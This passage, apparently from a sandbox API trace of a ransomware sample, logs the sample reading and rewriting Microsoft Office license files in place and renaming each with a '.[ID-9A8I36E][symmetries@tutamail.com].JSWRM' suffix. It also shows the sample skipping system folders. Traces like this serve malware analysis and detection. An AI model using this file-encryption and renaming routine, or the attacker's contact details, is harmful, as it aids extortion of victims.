(lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.848] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.848] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.848] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0102.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0102.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0102.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0102.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0102.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0102.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0102.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0102.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0102.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0102.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0102.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.849] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22224) returned 1 [0102.849] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x56d0) returned 0x24c1d0 [0102.849] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x56d0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x56d0, lpOverlapped=0x0) returned 1 [0102.853] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.853] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x56d0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x56d0, lpOverlapped=0x0) returned 1 [0102.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.853] CloseHandle (hObject=0x45c) returned 1 [0102.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0102.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0102.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0102.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0102.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0102.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0102.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.854] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0102.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0102.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0102.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.855] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3c494f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3c494f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3d080f5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d9a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="HODAE7~1.XRM")) returned 1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.855] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0102.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0102.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22d0a0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0102.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0102.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0102.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0102.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0102.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0102.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e0d0 [0102.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0102.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0102.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.856] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11674) returned 1 [0102.856] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0102.856] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0102.859] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.859] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0102.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.859] CloseHandle (hObject=0x45c) returned 1 [0102.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0102.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0102.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0102.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0102.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0102.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0102.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.860] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0102.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0102.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0102.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.861] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3a0d1e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3a0d1e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3b646e3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x559d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessPipcR_Grace-ppd.xrm-ms", cAlternateFileName="HOMEBU~1.XRM")) returned 1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.861] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0102.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0102.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0102.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0102.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0102.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0102.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0102.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0102.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0102.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e0d0 | out: hHeap=0x1e0000) returned 1 [0102.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0102.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.862] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21917) returned 1 [0102.862] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5590) returned 0x24c1d0 [0102.862] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5590, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5590, lpOverlapped=0x0) returned 1 [0102.867] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.867] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5590, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5590, lpOverlapped=0x0) returned 1 [0102.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.867] CloseHandle (hObject=0x45c) returned 1 [0102.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0102.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0102.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0102.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0102.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0102.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0102.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.868] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0102.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0102.868] HeapFree (in: 